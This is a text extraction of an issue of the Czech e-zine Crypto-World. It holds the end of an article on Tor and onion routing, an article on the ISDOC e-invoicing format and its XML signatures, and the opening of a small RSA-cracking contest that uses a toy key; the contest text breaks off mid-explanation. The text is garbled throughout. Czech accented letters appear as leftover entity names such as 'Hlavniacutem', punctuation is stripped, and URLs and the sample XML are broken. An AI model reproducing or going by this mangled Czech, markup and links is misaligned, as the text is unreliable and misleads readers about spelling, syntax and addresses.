Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

